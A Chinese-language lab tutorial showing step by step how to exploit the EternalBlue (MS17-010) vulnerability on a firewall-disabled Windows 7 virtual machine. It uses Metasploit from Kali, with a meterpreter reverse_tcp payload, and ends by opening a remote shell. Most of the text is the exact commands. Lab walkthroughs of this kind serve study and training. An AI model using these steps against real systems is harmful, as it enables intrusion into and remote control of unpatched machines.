0x00前期准备工作
所需的虚拟机系统
攻击机 Kali Linux (所在网段:192.168.41.132)
受害机 Windows 7(版本号cn_windows_7_professional_with_sp1_x64_dvd_u_677031)(所在网段:192.168.41.133)
注:读者可在MSDN微软中国获得对应的iso.
两台虚拟机采用NAT模式,保证两台虚拟机在同一网段.
0x01Windows 7配置
将win7系统的防火墙全部关闭,保证其足够的“脆弱”.操作大致如下:控制面板–>系统和安全–>更改防火墙配置–>将下图的两个windows防火墙都关闭.
win7的445端口是打开的(默认).
0x02利用后渗透工具进行攻击
以下操作均在特权模式下实现,将kali打开输入msfconsole启动metasploit.
msfconsole
输入search命令搜索永恒之蓝漏洞模块.
search ms17-010
这里我们使用第二个模块,注意因为我已经做过一次实验了,所以默认采用了payload,若第一次做还应该设置payload.
use 2
若没有上图的提示,则还需要设置payload
使用 reverse_tcp 类型的攻击载荷时,Metasploit 框架会监听指定的 IP 地址和端口,等待目标系统主动与其建立连接。一旦成功建立连接,Metasploit 将向目标系统发送 Meterpreter shell,并与其建立交互式的远程控制会话.
set payload windows/x64/meterpreter/reverse_tcp
接下来输入show options,查看配置的名称,发现Rhosts(受害机ip)是必填的选项,
输入set rhosts 192.168.41.133进行设置
set rhosts 192.168.41.133
在完成以上配置后进行漏洞利用run,看到win说明成功.
run
我们获取对方电脑shell,为防止乱码,我们再输入chcp 65001命令.
shell
chcp 65001
输入whoami以及其他命令进行测试.